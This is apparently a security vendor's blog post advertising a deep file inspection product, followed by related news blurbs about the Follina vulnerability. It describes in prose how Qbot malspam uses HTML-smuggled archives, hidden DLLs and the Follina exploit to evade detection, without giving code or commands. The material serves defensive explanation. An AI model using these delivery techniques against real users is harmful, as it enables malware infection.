Headline
Empower Your Security Operations Team to Combat Emerging Threats
When examining the modern threat landscape, empowering your security operations and overcoming the limitations inherent with other malware prevention solutions is imperative.
The implementation of defense-in-depth architectures and operating system hardening technologies have altered the threat landscape. Historically, zero-click, singular vulnerabilities were commonly discovered and exploited. The modern-day defensive posture requires attackers to successfully chain together multiple exploit techniques to gain control of a target system. The increased utilization of dynamic analysis systems has driven attackers to evade detection by requiring input or action from the user. Sometimes, the victim must perform several manual steps before the underlying payload is activated. Otherwise, it remains dormant and undetectable through behavioral analysis.
It is well known that client-side attacks are the predominant access vector for most initial access. Web browser and email-based malware campaigns target users through phishing, social engineering, and exploitation. Productivity and business tools from vendors like Adobe and Microsoft are widespread and provide attackers with many options. Combining the lack of security awareness training and well-developed social engineering tactics frequently results in users permitting the execution of malicious embedded logic like weaponized macros or other scripts. Analysis of these common malware carriers is time-consuming and tedious, and it requires expert skills. To adequately prevent, detect, and respond to these threats, an organization must throw everything at the problem and augment this previously human-intensive process.
Deep File Inspection (DFI) is one approach to ease the burden associated with continuous security monitoring. DFI is a static-analysis engine that inspects beyond Layer 7 of the OSI model, essentially automating the work of your typical SOC analyst or security researcher. Regardless of the complexity of evasive techniques a threat actor utilizes, DFI dissects malicious carriers to expose embedded logic, semantic context, and metadata. Coercive graphical lures are extracted and processed through a machine vision layer, adding to the semantic context of the original file. Commonly used obfuscation methods and encoding mechanisms are automatically discovered and deciphered.
A public concern that SOC analysts, IR teams, and security researchers encounter is the limited availability of context for detection analytics. In the case of intrusion prevention systems, resources are limited to microseconds of time and kilobytes of analyzable data. Intrusion detection systems can typically dig deeper, taking additional milliseconds to expose further data.
Regarding the time-analysis trade-off, the next step up is behavioral monitoring or sandboxed execution. This class of solutions detonates samples in a virtualized environment and annotates the system’s behavior for threat detection; this process is both compute- and time-intensive, taking minutes to analyze each file. There is a middle ground where a few additional seconds can provide previously unseen detection opportunities.
Use Case: Qbot Malware Delivered via Follina and Malspam
An example of an evasive threat is the recent TA570 campaigns that delivered Qbot malware with thread-hijacked emails. This wave of malspam utilized two different methods to provide the payload. The first method used a shortcut LNK to run a DLL with the hidden attribute. The second method is a Word document using the Follina (CVE-2022-30190) exploit.
Figure 2. Recent Qbot threat sequence. Source: InQuest
The attached HTML file contains an antiquated JS function to convert the embedded base64 string into a zip archive and prompt the victim to download. When extracted, the zip file contains a disk image that will be mounted showing either a shortcut or the shortcut and word document. The shortcut will execute the Qbot DLL within the directory with the hidden attribute set. At the same time, the Word file will attempt to exploit the MSDT vulnerability and download the payload from a remote server.
It is challenging for many solutions to carve the zip archive from the encoded HTML, extract the IMG file, and identify the weaponized contents. In this example, multiple threat signatures are seen from ambiguities within the SMTP headers, down to the hidden DLL or Follina document.
Figure 3. Variety of signatures alerts. Source: InQuest
Another interesting approach for detection is the concept of retrospective analysis or RetroHunting. While DFI creates a new dimension of data, RetroHunting provides a new dimension of time for analyzing historical events. The appearance of Follina and other zero-day vulnerabilities illustrates the usefulness of this capability by facilitating the detection of previously unseen alerts with emerging threat intelligence and detection logic.
In addition to a library of predeveloped signatures, analysts can develop user-defined YARA rules to combine strings, bytes patterns, and regular expressions via flexible conditional logic.
When confronted with novel attack techniques being encountered in the wild, security leaders must provide an opportunity to empower your detection operations and overcome the limitations inherent with other malware prevention solutions. A free resource to test the efficacy of a mail provider’s security controls is the Email Security Assessment.
About the Author
Josiah Smith has almost a decade of experience in the realm of security. Before becoming a threat engineer, Josiah worked as a cyber operator, overseeing signature management and host-based detection programs. He spent several years in a room without windows, focusing on network detection, threat hunting, and IR investigations. He began his career as a member of the US Air Force, and most of his experience is with the DoD.
Related news
A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five
Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the XWorm malware on targeted systems. Securonix, which is tracking the activity cluster under the name MEME#4CHAN, said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany. "The attack campaign has been leveraging rather
A threat cluster linked to the Russian nation-state actor tracked as Sandworm has continued its targeting of Ukraine with commodity malware by masquerading as telecom providers, new findings show. Recorded Future said it discovered new infrastructure belonging to UAC-0113 that mimics operators like Datagroup and EuroTransTelecom to deliver payloads such as Colibri loader and Warzone RAT. The
Hello everyone! In this episode, let’s take a look at the Microsoft Patch Tuesday August 2022 vulnerabilities. I use my Vulristics vulnerability prioritization tool as usual. I take comments for vulnerabilities from Tenable, Qualys, Rapid7, ZDI and Kaspersky blog posts. Also, as usual, I take into account the vulnerabilities added between the July and August […]
August Patch Tuesday tackles 121 CVEs, 17 critical bugs and one zero-day bug exploited in the wild.
An unknown threat actor has been targeting Russian entities with a newly discovered remote access trojan called Woody RAT for at least a year as part of a spear-phishing campaign. The advanced custom backdoor is said to be delivered via either of two methods: archive files and Microsoft Office documents leveraging the now-patched "Follina" support diagnostic tool vulnerability (CVE-2022-30190)
The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of a new set of spear-phishing attacks exploiting the "Follina" flaw in the Windows operating system to deploy password-stealing malware. Attributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled "Nuclear Terrorism
Threat actors associated with Russian intelligence are using the fear or nuclear war to spread data-stealing malware in Ukraine. The post Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine appeared first on Malwarebytes Labs.
This Metasploit module generates a malicious Microsoft Word document that when loaded, will leverage the remote template feature to fetch an HTML document and then use the ms-msdt scheme to execute PowerShell code.
A suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office "Follina" vulnerability to target government entities in Europe and the U.S. Enterprise security firm Proofpoint said it blocked attempts at exploiting the remote code execution flaw, which is being tracked CVE-2022-30190 (CVSS score: 7.8). No less than 1,000 phishing messages
Although organizations should perform proper risk analysis and patch as soon as practical after there's a fix for this vulnerability, defenders still have options before that's released.
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.
A recently discovered zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. CVE-2022-30190, also known under the name "Follina," exists when MSDT is called using the URL protocol from an application, such as Microsoft Office, Microsoft... [[ This is only the beginning! Please visit the blog for the complete entry ]]
Proof of concept for the remote code execution vulnerability in MSDT known as Follina.
Microsoft on Monday published guidance for a newly discovered zero-day security flaw in its Office productivity suite that could be exploited to achieve code execution on affected systems. The weakness, now assigned the identifier CVE-2022-30190, is rated 7.8 out of 10 for severity on the CVSS vulnerability scoring system. Microsoft Office versions Office 2013, Office 2016, Office 2019, and
On Monday May 30, 2022, Microsoft issued CVE-2022-30190 regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability. A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the … Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability Read More »